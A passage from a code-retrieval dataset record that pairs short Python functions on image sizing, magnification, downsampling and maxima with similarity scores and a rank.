targetSize=1e6):\n data = self.image\n if targetSize < 2: # keep at least two pixels\n targetSize = 2\n while True:\n h, w = data.shape[:2]\n if h * w <= targetSize: break\n if h > w:\n data = data[::2, ::] # downsample first axis\n else:\n data = data[::, ::2] # downsample second axis\n return self._xp.nanmin(data), self._xp.nanmax(data)", "def imageScale(scale):\n\t\treturn max(1, int(scale * (InterfaceTools.getCanvasSize()[0] / height)))", "def getMagBoundary(self):\n\n # Get the boundary of magnitude based on the filter\n lowMagnitude = nan\n highMagnitude = nan\n if (self.filter == self.FilterU):\n lowMagnitude = 7.94\n highMagnitude = 14.80\n\n elif (self.filter == self.FilterG):\n lowMagnitude = 9.74\n highMagnitude = 16.17\n\n elif (self.filter == self.FilterR):\n lowMagnitude = 9.56\n highMagnitude = 15.73\n\n elif (self.filter == self.FilterI):\n lowMagnitude = 9.22\n highMagnitude = 15.26\n\n elif (self.filter == self.FilterZ):\n lowMagnitude = 8.83\n highMagnitude = 14.68\n \n elif (self.filter == self.FilterY):\n lowMagnitude = 8.02\n highMagnitude = 13.76\n\n return lowMagnitude, highMagnitude", "def get_thumbnail_size(self, thumbnail_name, forced=False):", "def maxSize(image, maxSize, method=3):\n imAspect = float(image.size[0]) / float(image.size[1])\n outAspect = float(maxSize[0] / float(maxSize[1]))\n\n if imAspect >= outAspect:\n return image.resize(\n (maxSize[0], int((float(maxSize[0]) / imAspect) + 0.5)), method\n )\n else:\n return image.resize(\n (int((float(maxSize[1]) * imAspect) + 0.5), maxSize[1]), method\n )", "def mag2(self) -> numbers.Number:\n mv_val = self.layout.gmt_func(self.layout.adjoint_func(self.value), self.value)\n return mv_val[0]", "def GetSizeGreatestPrimeFactor(self) -> \"unsigned long long\":\n return _itkHalfHermitianToRealInverseFFTImageFilterPython.itkHalfHermitianToRealInverseFFTImageFilterICF3IF3_GetSizeGreatestPrimeFactor(self)", "def get_image_size(self, **kwargs):\n points = kwargs['points']\n max_val = points.max(0)\n min_val = points.min(0)\n height = np.ceil((max_val[0] - min_val[0]) * self.res_x).astype(int)\n width = np.ceil((max_val[1] - min_val[1]) * self.res_y).astype(int)\n\n return height, width", "def find_shower_max_height(self, energy, h_first_int, gamma_alt):\n\n # offset of the shower-maximum in radiation lengths\n c = 0.97 * log(energy / (83 * u.MeV)) - 1.32\n # radiation length in dry air at 1 atm = 36,62 g / cm**2 [PDG]\n c *= 36.62 * u.g * u.cm ** -2\n # showers with a more horizontal direction spend more path\n # length in each atm. layer the \"effective transverse\n # thickness\" they have to pass is reduced\n c *= np.sin(gamma_alt)\n\n # find the thickness at the height of the first interaction\n t_first_int = self.thickness_profile(h_first_int)\n\n # total thickness at shower maximum = thickness at first\n # interaction + thickness traversed to shower maximum\n t_shower_max = t_first_int + c\n\n # now find the height with the wanted thickness by solving for the\n # desired thickness\n return self.altitude_profile(t_shower_max)", "def calcMag(self):\n M = np.sum(self.config)\n return M", "def img_extent(img):\n# get the image coordinates in pixels\n px0 = img.meta['crpix1']\n py0 = img.meta['crpix2']\n# get the image coordinates in arcsec \n ax0 = img.meta['crval1']\n ay0 = img.meta['crval2']\n# get the image scale in arcsec \n axd = img.meta['cdelt1']\n ayd = img.meta['cdelt2']\n#get the number of pixels\n tx,ty = img.data.shape\n#get the max and min x and y values\n minx,maxx = px0-tx,tx-px0\n miny,maxy = py0-ty,ty-py0\n#convert to arcsec\n maxx,minx = maxx*axd,minx*axd\n maxy,miny = maxy*ayd,miny*ayd\n\n\n return maxx,minx,maxy,miny", "def _maxAlien(self):\n maxA = 0\n for r in self._aliens:\n for y in r:\n if(y != None):\n maxA = max(maxA,y.x)\n return maxA", "def extractPeak( image, nSizeX, nSizeY, nMaxSize, nMaxNbr = 5, nErrorValue = -1 ):\n blobs = []; # will contain the center of the blob and it's max value\n nSmallerMax = 0; # the max value of the smallest peak\n nSmallerIdx = -1;\n nMaxSizeSquared = nMaxSize*nMaxSize;\n for y in range( nSizeY ):\n for x in range( nSizeX ):\n# print( \"x,y: %d,%d\" % (x,y) );\n nVal = image[x+y*nSizeX];\n if( nVal != nErrorValue ):\n if( nVal > nSmallerMax ):\n # update blobs\n # find in blobs\n bFound = False; \n bUpdateSmallerMax = False;\n n = 0;\n while( n < len( blobs ) ):\n if( distSquared( blobs[n][0], blobs[n][1], x, y ) < nMaxSizeSquared ):\n # found it!\n if( nVal > blobs[n][2] ):\n # update this blobs\n blobs[n][0] = x;\n blobs[n][1] = y;\n blobs[n][2] = nVal;\n if( nSmallerMax == nVal ):\n # update smaller max\n bUpdateSmallerMax = True;\n bFound = True;\n break;\n n += 1;\n if( not bFound ):\n # create a new one\n if( len( blobs ) < nMaxNbr ):\n # create from scratch\n blobs.append( [x,y,nVal] );\n bUpdateSmallerMax = True;\n else:\n # reuse smaller\n blobs[nSmallerIdx][0] = x;\n blobs[nSmallerIdx][1] = y;\n blobs[nSmallerIdx][2] = nVal;\n bUpdateSmallerMax = True;\n \n if( bUpdateSmallerMax ):\n nSmallerMax = 0xFFFFFFF;\n for idx, blob in enumerate( blobs ):\n if( blob[2] < nSmallerMax ):\n nSmallerMax = blob[2];\n nSmallerIdx = idx;\n# print( \"blobs: %s\" % str( blobs ) );\n # if( nVal > nSmallerMax ) - end\n # if( nVal != nErrorValue ) - end\n \n # convert to fixed size\n for idx, blob in enumerate( blobs ):\n blobs[idx].append( 50-idx*10 );\n\n return blobs;", "def mag(a):\n return sqrt(a[0]*a[0]+a[1]*a[1]+a[2]*a[2])", "def size_from_name(size, sizes):\n\n by_name = [s for s in sizes if s.name == size]\n if len(by_name) > 1:\n raise Exception('more than one image named %s exists' % size)\n return by_name[0]", "def _get_max_image_bytes(self):\n raise NotImplementedError(\"Abstract method not implemented\")", "def downScaleResolution(kv, factor=10):\n sub_img_name = kv[0]\n sub_image = kv[1]\n img_dimension = len(sub_image)\n big_image = sub_image\n Nbig = img_dimension\n Nsmall = Nbig//factor\n small_image = big_image.reshape([Nsmall, Nbig // Nsmall, Nsmall, Nbig // Nsmall]).mean(3).mean(1)\n return (sub_img_name,small_image)", "def _SizeCalculator(partition_size):\n # Minus footer size to return max image size.\n return partition_size - int(math.pow(partition_size, 0.95))", "def get_size(image):\n width, height = image.size\n\n return (width, height)", "def find_suggested_tonemap_scale(session):\n avg_film_luminance = session.GetFilm().GetFilmY()\n return (1.25 / avg_film_luminance * (118 / 255))\n\n # TODO\n # measure this all the time, show a message to the user if\n # abs(old - new) > threshold\n # so the user can set the new value with one click\n\n # imagepipeline = scene.camera.data.luxcore.imagepipeline\n # imagepipeline.tonemapper.linear_scale = suggested_linear_scale\n # imagepipeline.tonemapper.use_autolinear = False", "def get_max_min(block_size):\r\n return (int(block_size / 2), int((block_size - 1) / 2))", "def max_size(self):\n sizes = np.array([m.sum() for m in self.masks])\n return sizes.max()", "def max_min_kmer_sizes(filename):\n try:\n fh = gzip.open if isgzip(filename) else open\n with fh(filename, 'rt') as f:\n kmer_sizes = np.array([len(rec.split()[0]) for rec in f])\n\n return kmer_sizes.min(), kmer_sizes.max()\n\n except Exception:\n print('Not able to read file [%s]\\n' % filename)\n raise", "def size(img):\n\treturn img.size", "def density_maxima(self, samplesize=5, thresh_mod=0):\r\n filtered = ndimage.maximum_filter(self.data, size=(samplesize, samplesize, samplesize), mode=\"wrap\")\r\n\r\n threshold = filtered.mean() + thresh_mod\r\n print(f\"actual threhold value: {threshold:.2f}\")\r\n labels, num_labels = ndimage.label(filtered > threshold)\r\n\r\n # Coordinates of maxima\r\n pos = np.array(ndimage.measurements.center_of_mass(np.asarray(self.data), labels=labels,\r\n index=np.arange(1, num_labels + 1)))\r\n\r\n # Values of maxima\r\n val = np.array(ndimage.measurements.maximum(self.data, labels=labels, index=np.arange(1, num_labels + 1)))\r\n\r\n pos[:, 0] *= iCube.x[0]\r\n pos[:, 1] *= iCube.y[1]\r\n pos[:, 2] *= iCube.z[2]\r\n\r\n return pos, val", "def get_max_point(image):\r\n max_value= 0\r\n better_point= None\r\n for line in range(len(image)):\r\n for column in range(len(image[0])):\r\n if image[line][column]>max_value:\r\n max_value= image[line][column]\r\n better_point = [line,column]\r\n return better_point", "def resizeImage(image, maxW, maxH):\n\timageW, imageH = image.size\n\tif imageW == maxW and imageH == maxH:\n\t\treturn image\n\t# find which axis requires the biggest zoom (smallest relative max dimension)\n\tzoomW = float(imageW) / float(maxW)\n\tzoomH = float(imageH) / float(maxH)\n\tzoom = max(zoomW, zoomH)\n\tif zoomW >= zoomH:\t# size is defined by width\n\t\tmaxH = int(imageH//zoom)\t# calculate the new height\n\telse:\n\t\tmaxW = int(imageW//zoom)\n\treturn image.resize((maxW, maxH))", "def output_image_size(n_patches_x, n_patches_y, patch_size):\n width = n_patches_x * patch_size\n height = n_patches_y * patch_size\n return width, height", "def mag(field):\n return np.sqrt(np.sum(field**2, axis=0, keepdims=True))", "def get_detector_size(self):\n sensor=self._get_sensor_info()\n return sensor.nMaxWidth,sensor.nMaxHeight", "def _get_image_size(self):\n return (3, 224, 224)", "def magnitude_ratio(magnitudes):\n median = np.median(magnitudes)\n\n points_above_median = magnitudes[magnitudes > median].size\n\n return points_above_median / magnitudes.size", "def compute_resolution(zoom, size_px):\n # Calibration data:\n dist_in_um = 10\n dist_in_px = np.array([21.13, 19.62, 8.93])\n zooms = np.array([1.5, 3, 4.5])\n image_max_sizes = np.array([330, 610, 410])\n \n return np.mean((dist_in_um/dist_in_px) * (zoom/zooms) * (image_max_sizes/size_px))" ]
[ "0.7177108", "0.71568376", "0.6950366", "0.67886364", "0.6724605", "0.65802383", "0.62866354", "0.6198589", "0.60788", "0.60172695", "0.599912", "0.5912535", "0.5909752", "0.5874121", "0.5848604", "0.58275664", "0.5797984", "0.5797821", "0.57959604", "0.57886523", "0.5763161", "0.56523824", "0.5649488", "0.56480813", "0.5642267", "0.5629", "0.56090206", "0.55947185", "0.5585838", "0.55747986", "0.55747986", "0.5572482", "0.5566037", "0.55623645", "0.5559744", "0.55422705", "0.5530884", "0.55151796", "0.5513619", "0.55080974", "0.54986167", "0.5493552", "0.54880935", "0.5484176", "0.5477793", "0.5446075", "0.54431546", "0.54420954", "0.54399216", "0.5439287", "0.54308695", "0.5421762", "0.54194254", "0.541857", "0.54110783", "0.5410925", "0.5409924", "0.54087454", "0.5385484", "0.53811336", "0.53771275", "0.5376934", "0.53662807", "0.5360905", "0.53575027", "0.53373563", "0.5333989", "0.5309991", "0.53051704", "0.53025174", "0.5301956", "0.5296521", "0.52930796", "0.5282824", "0.52782375", "0.5277039", "0.5269215", "0.5267064", "0.52658653", "0.525369", "0.5252502", "0.5252395", "0.52521735", "0.52504617", "0.52434176", "0.5242736", "0.52386385", "0.5237124", "0.5235637", "0.523377", "0.5232412", "0.52323717", "0.52303815", "0.5230072", "0.52296305", "0.52140343", "0.5211529", "0.52107555", "0.52028465", "0.52006763" ]
0.7147567
2
Get the image size the highest magnification image would have to be resized to get an equivalent magnification
def get_size_for_mag(slide, mag): max_size = slide.dimensions max_mag = highest_mag(slide) downsample = max_mag/mag return [np.int(np.round(dim/downsample)) for dim in max_size]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getZoomFactor(imageSize, maxW, maxH):\n\timageW, imageH = imageSize\n\tzoomW = float(imageW) / float(maxW)\n\tzoomH = float(imageH) / float(maxH)\n\treturn max(zoomW, zoomH)", "def get_image_size(self):", "def get_thumbnail_magnification(slide):\n ratio = np.asarray(slide.dimensions) / np.asarray(slide.associated_images[\"thumbnail\"].size)\n # np.sqrt(np.prod(ratio))\n return ratio", "def _image_resolution(image_filename):\n img = mpimg.imread(image_filename)\n return img.shape", "def get_mag_for_size(slide, size):\n max_size = slide.dimensions\n max_mag = highest_mag(slide)\n downsample = np.average([max_dim/size_dim for max_dim, size_dim in zip(max_size, size)])\n return max_mag/downsample", "def image_size(size):\n l_max = max(size)\n if l_max > 300:\n num = l_max/300\n else:\n num = 1\n w = round(size[0] / num)\n h = round(size[1] / num)\n new_size = [w, h]\n return new_size", "def img_scale(self):\n return min(400, abs(self.size))", "def size(img):\n\treturn img.size", "def calc_image_size(spr):\n return int(max(spr.label_safe_width(), 1)), \\\n int(max(spr.label_safe_height(), 1))", "def get_size(img):\n ih, iw = img.shape[:2]\n return iw * ih", "def get_image_size(self, **kwargs):\n points = kwargs['points']\n max_val = points.max(0)\n min_val = points.min(0)\n height = np.ceil((max_val[0] - min_val[0]) * self.res_x).astype(int)\n width = np.ceil((max_val[1] - min_val[1]) * self.res_y).astype(int)\n\n return height, width", "def get_new_img_size(w, h, img_min_side = 600):\n if w <= h:\n f = float(img_min_side) / w\n resized_h = int(f * h)\n resized_w = img_min_side\n else:\n f = float(img_min_side) / h\n resized_w = int(f * w)\n resized_h = img_min_side\n \n return resized_w, resized_h", "def _get_target_scale(self, im_size_min, im_size_max, target_size, max_size):\n im_scale = float(target_size) / float(im_size_min)\n # Prevent the biggest axis from being more than max_size\n if np.round(im_scale * im_size_max) > max_size:\n im_scale = float(max_size) / float(im_size_max)\n return im_scale", "def _get_extended_image_size(height, width, patch_size, stride):\n\n ext_height, ext_width = 0, 0\n\n def sliding_distance(n_windows, window_size, stride):\n return window_size * n_windows - (window_size - stride) * (n_windows - 1)\n\n if height < patch_size:\n ext_height = patch_size\n else:\n for n in range(height):\n distance = sliding_distance(n, patch_size, stride)\n if distance > height:\n ext_height = distance\n break\n\n if width < patch_size:\n ext_width = patch_size\n else:\n for n in range(width):\n distance = sliding_distance(n, patch_size, stride)\n if distance > width:\n ext_width = distance\n break\n\n return ext_height, ext_width", "def mag(self):\n return self.photosamplers.get_estimate(mag=True)[0]", "def getScaledDimensions(size, max_size, returnFactor=False):\n\n width, height = size\n max_width, max_height = max_size\n if (max_width, max_height) == (0, 0) or (width, height) == (0, 0): return (0, 0)\n wfactor, hfactor = 1.0, 1.0\n\n if width > max_width: wfactor = float(max_width) / width\n if height > max_height: hfactor = float(max_height) / height\n\n factor = min(wfactor, hfactor)\n\n size = (width * factor, height * factor)\n\n if not returnFactor:\n return size\n else:\n return size, factor", "def get_height():\n return resize.transforms[1].size", "def GetBestSize(self):\n bmp = self._bitmap\n return wx.Size(bmp.GetWidth(), bmp.GetHeight())", "def get_resize_to(image, size_x, size_y):\n scale_x = image.shape[0] // size_x\n scale_y = image.shape[1] // size_y\n if scale_x == 0 or scale_y == 0:\n return 3, None\n if image.shape[0] % scale_x != 0 or image.shape[1] % scale_y != 0:\n return 1, None\n if image.shape[0] < scale_x or image.shape[1] < scale_y:\n return 2, None\n\n arrays = []\n for i in range(scale_x):\n for j in range(scale_y):\n arrays.append(image[i::scale_x, j::scale_y])\n\n result = mode(np.stack(arrays), axis=0).mode[0]\n if result.max() > 10:\n print(1)\n\n return 0, result", "def pixel_size_ratio(self):\n return 2**(self.levels[-1] - self.levels[0])", "def get_image_size(self, **kwargs):\n fov_height = np.abs(self.fov_pitch[1] - self.fov_pitch[0])\n fov_width = np.abs(self.fov_yaw[1] - self.fov_yaw[0])\n height = np.ceil(fov_height * self.res_pitch).astype(int)\n width = np.ceil(fov_width * self.res_yaw).astype(int)\n\n return height, width", "def _SizeCalculator(partition_size):\n # Minus footer size to return max image size.\n return partition_size - int(math.pow(partition_size, 0.95))", "def get_image_size(frame) -> tuple:\n return tuple(frame.shape[1::-1])", "def calc_thumbnail_size(img):\n width, length = img.size\n ratio = width / length\n\n # for some reason, if it's exactly 224, then thumnailed image is 223\n dim = 224 + 1 # output dim\n if ratio > 1:\n size = (dim * ratio, dim)\n else:\n size = (dim, dim / ratio)\n# print(size)\n return size", "def _select_largest_photo(self, sizes):\n\n max_size = 0\n photo = ''\n for size in sizes:\n w = size['width']\n h = size['height']\n if w * h >= max_size:\n max_size = w * h\n photo = size['url']\n return photo", "def _get_image_size(self):\n return (3, 224, 224)", "def resizeImage(image, maxW, maxH):\n\timageW, imageH = image.size\n\tif imageW == maxW and imageH == maxH:\n\t\treturn image\n\t# find which axis requires the biggest zoom (smallest relative max dimension)\n\tzoomW = float(imageW) / float(maxW)\n\tzoomH = float(imageH) / float(maxH)\n\tzoom = max(zoomW, zoomH)\n\tif zoomW >= zoomH:\t# size is defined by width\n\t\tmaxH = int(imageH//zoom)\t# calculate the new height\n\telse:\n\t\tmaxW = int(imageW//zoom)\n\treturn image.resize((maxW, maxH))", "def GetSizeGreatestPrimeFactor(self) -> \"unsigned long long\":\n return _itkHalfHermitianToRealInverseFFTImageFilterPython.itkHalfHermitianToRealInverseFFTImageFilterICF2IF2_GetSizeGreatestPrimeFactor(self)", "def recommended_size(img_shape):\r\n new_width = 512\r\n new_height = img_shape[0] / img_shape[1] * 512\r\n new_height = round(new_height / 32) * 32\r\n return new_width, new_height", "def format_img_size(self, img, C):\n img_min_side = float(C.im_size)\n (height,width,_) = img.shape\n\n if width <= height:\n ratio = img_min_side/width\n new_height = int(ratio * height)\n new_width = int(img_min_side)\n else:\n ratio = img_min_side/height\n new_width = int(ratio * width)\n new_height = int(img_min_side)\n img = cv2.resize(img, (new_width, new_height), interpolation=cv2.INTER_CUBIC)\n return img, ratio", "def get_size(image):\n width, height = image.size\n\n return (width, height)", "def get_image_size(file_name):\r\n return Image.open(file_name).size", "def image_size(cls):\n return random.randint(250000, 80000000000)", "def highest_mag(slide):\n return int(slide.properties['aperio.AppMag'])", "def min_image_length(self):\n\n # Will contain the minimum number of super pixels on return.\n px = ct.c_int()\n self.lib.GetMinimumImageLength(ct.pointer(px))\n\n return px.value", "def GetSizeGreatestPrimeFactor(self) -> \"unsigned long long\":\n return _itkHalfHermitianToRealInverseFFTImageFilterPython.itkHalfHermitianToRealInverseFFTImageFilterICF3IF3_GetSizeGreatestPrimeFactor(self)", "def format_img_size(img, C):\n img_min_side = float(C.im_size)\n (height, width, _) = img.shape\n\n if width <= height:\n ratio = img_min_side / width\n new_height = int(ratio * height)\n new_width = int(img_min_side)\n else:\n ratio = img_min_side / height\n new_width = int(ratio * width)\n new_height = int(img_min_side)\n img = cv2.resize(img, (new_width, new_height), interpolation=cv2.INTER_CUBIC)\n return img, ratio", "def format_img_size(img, C):\n img_min_side = float(C.im_size)\n (height, width, _) = img.shape\n\n if width <= height:\n ratio = img_min_side / width\n new_height = int(ratio * height)\n new_width = int(img_min_side)\n else:\n ratio = img_min_side / height\n new_width = int(ratio * width)\n new_height = int(img_min_side)\n img = cv2.resize(img, (new_width, new_height), interpolation=cv2.INTER_CUBIC)\n return img, ratio", "def camera_image_size():\n camera = GigE_camera(parameter(\"camera.IP_addr\"))\n width,height = camera.width,camera.height\n orientation = parameter('Orientation',90) # in degrees counter-clockwise\n if orientation == None: orienation = 0\n orientation %= 360\n if orientation == 90 or orientation == 270: width,height = height,width\n return width,height", "def get_detector_size(self):\n sensor=self._get_sensor_info()\n return sensor.nMaxWidth,sensor.nMaxHeight", "def recommended_size(img_shape):\n new_width = 512\n new_height = img_shape[0] / img_shape[1] * 512\n new_height = round(new_height / 32) * 32\n return new_width, int(new_height)", "def get_size(self, index):\n return self.image_sizes[index]", "def pix_size(self):\n return self._pix_size", "def max_scale_image(self):\n maximum = np.argmax(self.transform, 0)\n return self.scale_array[maximum] * (self.support.sum(0) > 0)", "def output_image_size(n_patches_x, n_patches_y, patch_size):\n width = n_patches_x * patch_size\n height = n_patches_y * patch_size\n return width, height", "def get_image_size(image_name='default.png'):\n\timg = Image.open(image_name)\n\treturn (img.width, img.height)", "def max_size(self):\n sizes = np.array([m.sum() for m in self.masks])\n return sizes.max()", "def minimum_size(self):\n return self.fwhm*2.", "def get_scaling_ratio(img):\n\n healthy_img_area = 4872 * 6496\n input_img_area = img.shape[0] * img.shape[1]\n ratio = input_img_area / healthy_img_area\n return ratio", "def stdsize(image,r=30):\n image = square(image)\n s,_ = image.shape\n return interpolation.zoom(image,(r+0.5)/float(s))", "def _get_box_sizes(self, image_info, cat):\n\n\n file_id=0\n impath=image_info['image_path'][file_id].strip()\n ext=image_info['image_ext'][file_id]\n wcs_data = fitsio.read_header(impath, ext=ext)\n wcs = eu.wcsutil.WCS(wcs_data)\n\n\n jacob = wcs.get_jacobian(100,100)\n dudcol, dudrow, dvdcol, dvdrow = jacob\n\n det = dvdrow*dudcol - dvdcol*dudrow\n pixel_scale = np.sqrt(abs(det))\n print('found pixel scale:',pixel_scale)\n box_size = cat['box_size_arcsec']/pixel_scale\n\n # clip to range\n box_size.clip(\n min=self['min_box_size'],\n max=self['max_box_size'],\n out=box_size,\n )\n box_size = box_size.astype('i4')\n\n w,=np.where( ( (box_size % 2) != 0 ) )\n if w.size > 0:\n box_size[w] += 1\n\n return box_size", "def size(self):\n return self._image_size", "def imageScale(scale):\n\t\treturn max(1, int(scale * (InterfaceTools.getCanvasSize()[0] / height)))", "def _SizeCalculator(partition_size):\n # Max image size grows less than partition size, which means\n # footer size grows faster than partition size.\n return int(math.pow(partition_size, 0.95))", "def max_zoom(self) -> float:\n return math.log(np.min(self.canvas_size) / REGION_DIM)", "def get_spatial_image_size(image_resizer_config):\n if image_resizer_config.HasField(\"fixed_shape_resizer\"):\n return [\n image_resizer_config.fixed_shape_resizer.height,\n image_resizer_config.fixed_shape_resizer.width\n ]\n if image_resizer_config.HasField(\"keep_aspect_ratio_resizer\"):\n if image_resizer_config.keep_aspect_ratio_resizer.pad_to_max_dimension:\n return [image_resizer_config.keep_aspect_ratio_resizer.max_dimension] * 2\n else:\n return [-1, -1]\n if image_resizer_config.HasField(\n \"identity_resizer\") or image_resizer_config.HasField(\n \"conditional_shape_resizer\"):\n return [-1, -1]\n raise ValueError(\"Unknown image resizer type.\")", "def get_min_mag_center(self):\r\n\t\treturn self.min_mag + self.bin_width / 2", "def CalculateMaxImageSize(self, partition_size):\n raise NotImplementedError", "def get_erode_size(self, obj_size):\n max_size = np.sqrt(obj_size[0]**2 + obj_size[1]**2)\n erode_size = int(np.round(max_size / self.pix_size))\n return erode_size", "def get_max_rois(self):\n \n maxsize = 0\n for index in self.SampleID:\n rois = self.__getrois__(index);\n maxsize = max(maxsize, rois.shape[0])\n \n return maxsize", "def get_thumbnail_size(self, thumbnail_name, forced=False):", "def _get_max_image_bytes(self):\n raise NotImplementedError(\"Abstract method not implemented\")", "def calculate_max_height_width(imgs):\n h_w_map = np.zeros((len(imgs), 2), dtype=np.int32)\n for index, img in enumerate(imgs):\n h_w_map[index, 0], h_w_map[index, 1], _ = img.shape\n max_val = h_w_map.argmax(axis=0)\n max_height, max_width = h_w_map[max_val[0], 0], h_w_map[max_val[1], 1]\n return max_height, max_width", "def _resize(img, max_dim=128):\n if max(img.shape[:3]) <= max_dim:\n return img\n else:\n new_size = [max_dim / s if s >= max_dim else 1.0 for s in img.shape[:3]]\n new_size.append(1.0) # for channel\n return scipy.ndimage.zoom(img, new_size, order=2)", "def scaled_image(width, height):\r\n total = width*height\r\n scale_dict = {0.2: 6500000, 0.3: 4000000, 0.4: 2250000, 0.5: 1000000, 0.8: 500000, 1: 0}\r\n for k, v in scale_dict.items():\r\n if total > v:\r\n return k", "def ratio(self):\n return float(self.max_width) / self.max_height", "def size(self):\n if self._size and not self._pil_image:\n return self._size\n else:\n return self.pil_image.size", "def _get_image_size(img: Any) -> List[int]:\n if _is_numpy_image(img):\n return img.shape[1::-1]\n raise TypeError(\"Unexpected type {}\".format(type(img)))", "def retinanet_compute_resize_scale(image_shape, min_side=800, max_side=1333):\n (rows, cols, _) = image_shape\n\n smallest_side = min(rows, cols)\n\n # rescale the image so the smallest side is min_side\n scale = float(min_side) / float(smallest_side)\n\n # check if the largest side is now greater than max_side, which can happen\n # when images have a large aspect ratio\n largest_side = max(rows, cols)\n if largest_side * scale > max_side:\n scale = float(max_side) / float(largest_side)\n\n return scale", "def maxSize(image, maxSize, method=3):\n imAspect = float(image.size[0]) / float(image.size[1])\n outAspect = float(maxSize[0] / float(maxSize[1]))\n\n if imAspect >= outAspect:\n return image.resize(\n (maxSize[0], int((float(maxSize[0]) / imAspect) + 0.5)), method\n )\n else:\n return image.resize(\n (int((float(maxSize[1]) * imAspect) + 0.5), maxSize[1]), method\n )", "def resize(img, output_size=(350, 350)):\n\n if img and hasattr(img, \"url\"):\n image = Image.open(img)\n m_width = float(output_size[0])\n m_height = float(output_size[1])\n w_k = image.size[0] / m_width\n h_k = image.size[1] / m_height\n if output_size < image.size:\n if w_k > h_k:\n new_size = (m_width, image.size[1] / w_k)\n else:\n new_size = (image.size[0] / h_k, m_height)\n else:\n new_size = image.size\n new_size = tuple(map(int, new_size))\n return new_size\n return None", "def test_modis_resize(self):\n modis_order = {'mod09a1': {'inputs': 'mod09a1.a2000072.h02v09.005.2008237032813',\n 'products': ['l1']},\n 'resampling_method': 'cc',\n 'resize': {'pixel_size': 30,\n 'pixel_size_units': 'meters'},\n 'format': 'gtiff'}\n\n exc = 'pixel count value is greater than maximum size of'\n\n try:\n api.validation(modis_order, self.staffuser.username)\n except Exception as e:\n assert(exc in str(e))\n else:\n self.fail('Failed MODIS pixel resize test')", "def _get_current_size(self, name):\n logger.debug(\"Getting size: '%s'\", name)\n if not self._previewtrain.get(name, None):\n return None\n img = self._previewtrain[name][1]\n if not img:\n return None\n logger.debug(\"Got size: (name: '%s', width: '%s', height: '%s')\",\n name, img.width(), img.height())\n return img.width(), img.height()", "def pixelSize(self):\n br = self.sceneBoundingRect()\n if self.image is None:\n return 1,1\n return br.width()/self.width(), br.height()/self.height()", "def get_image_size(fname):\r\n \r\n logging.debug('get_image_size({})'.format(fname))\r\n\r\n with open(fname, 'rb') as fhandle:\r\n head = fhandle.read(24)\r\n if len(head) != 24:\r\n return\r\n if imghdr.what(fname) == 'png':\r\n check = struct.unpack('>i', head[4:8])[0]\r\n if check != 0x0d0a1a0a:\r\n logging.debug('get_image_size - Stopping application with exit code \"2\"\\n')\r\n sys.exit(2)\r\n width, height = struct.unpack('>ii', head[16:24])\r\n elif imghdr.what(fname) == 'gif':\r\n width, height = struct.unpack('<HH', head[6:10])\r\n elif imghdr.what(fname) == 'jpeg':\r\n try:\r\n fhandle.seek(0) # Read 0xff next\r\n size = 2\r\n ftype = 0\r\n while not 0xc0 <= ftype <= 0xcf:\r\n fhandle.seek(size, 1)\r\n byte = fhandle.read(1)\r\n while ord(byte) == 0xff:\r\n byte = fhandle.read(1)\r\n ftype = ord(byte)\r\n size = struct.unpack('>H', fhandle.read(2))[0] - 2\r\n # We are at a SOFn block\r\n fhandle.seek(1, 1) # Skip `precision' byte.\r\n height, width = struct.unpack('>HH', fhandle.read(4))\r\n except Exception: #IGNORE:W0703\r\n logging.debug('get_image_size - Stopping application with exit code \"2\"\\n')\r\n sys.exit(2)\r\n else:\r\n logging.debug('get_image_size - Stopping application with exit code \"2\"\\n')\r\n sys.exit(2)\r\n logging.debug('get_image_size - width, height = {}, {}'.format(width, height))\r\n return width, height", "def descender_size( self ):\n if self.face.descender == 0:\n return 0\n\n _desc_pixels = self.max_height * ( abs(self.face.descender) / self.face.height )\n return round( _desc_pixels ) # over 2.4 -> 2 ; 2.5 -> 2 ; 2.51 -> 3", "def getMaxMancount(self):\n return self.__size * 20", "def get_pixel_size(img):\n\tp1 = img.get_attr_default(\"apix_x\", -1.0)\n\tcc = img.get_attr_default(\"ctf\", None)\n\tif cc == None:\n\t\tp2 = -1.0\n\telse:\n\t\tp2 = round(cc.apix, 3)\n\tif p1 == -1.0 and p2 == -1.0:\n\t\tERROR(\"Pixel size not set\", \"get_pixel_size\", 0)\n\t\treturn -1.0\n\telif p1 > -1.0 and p2 > -1.0:\n\t\tif abs(p1-p2) >= 0.001:\n\t\t\tERROR(\"Conflict between pixel size in attribute and in ctf object\", \"get_pixel_size\", 0)\n\t\t# pixel size is positive, so what follows omits -1 problem\n\t\treturn max(p1, p2)\n\telse:\n\t\treturn max(p1, p2)", "def image_size():\n return eval(subprocess(\"print camera_image_size()\"))", "def minimum_size(self):\n return self.r_eff*3", "def _get_crop_size(self, image_size):\n h, w = image_size\n if self.crop_type == 'absolute':\n return (min(self.crop_size[0], h), min(self.crop_size[1], w))\n elif self.crop_type == 'absolute_range':\n assert self.crop_size[0] <= self.crop_size[1]\n crop_h = np.random.randint(\n min(h, self.crop_size[0]),\n min(h, self.crop_size[1]) + 1)\n crop_w = np.random.randint(\n min(w, self.crop_size[0]),\n min(w, self.crop_size[1]) + 1)\n return crop_h, crop_w\n elif self.crop_type == 'relative':\n crop_h, crop_w = self.crop_size\n return int(h * crop_h + 0.5), int(w * crop_w + 0.5)\n elif self.crop_type == 'relative_range':\n crop_size = np.asarray(self.crop_size, dtype=np.float32)\n crop_h, crop_w = crop_size + np.random.rand(2) * (1 - crop_size)\n return int(h * crop_h + 0.5), int(w * crop_w + 0.5)", "def test_correct_image_size(location):\n chunkloc = resave_to_chunks(root=location[\"dir\"],\n n_imgs=10,\n output_stem=location[\"stem\"])\n\n loaded = np.load(chunkloc)\n assert len(loaded.files) > 0\n\n first = loaded[loaded.files[0]]\n assert first.shape != ()\n assert first.shape == (520, 696)", "def getimagesize(filename):\n img = Image.open(filename)\n (w,h) = img.size\n t = \"IMAGETYPE_%S\" % img.format\n a = \"width=\\\"%d\\\" height=\\\"%d\\\"\" % img.size\n return (w,h,t,a)", "def default_size(self):\n if self._default_size is None:\n try:\n im = self.images['MUSE_WHITE']\n except KeyError:\n raise ValueError('Size of the image is required')\n else:\n self._default_size = (im.shape[0] *\n im.wcs.get_step(unit=u.arcsec)[0])\n return self._default_size", "def get_bounding_box_size(images):\n height = max(image.shape[0] for image in images)\n width = max(image.shape[1] for image in images)\n return height, width", "def get_bounding_box_size(images):\n height = max(image.shape[0] for image in images)\n width = max(image.shape[1] for image in images)\n return height, width", "def get_image_size(path : str):\n from PIL import Image\n im = Image.open(path)\n return im.size # W, H", "def 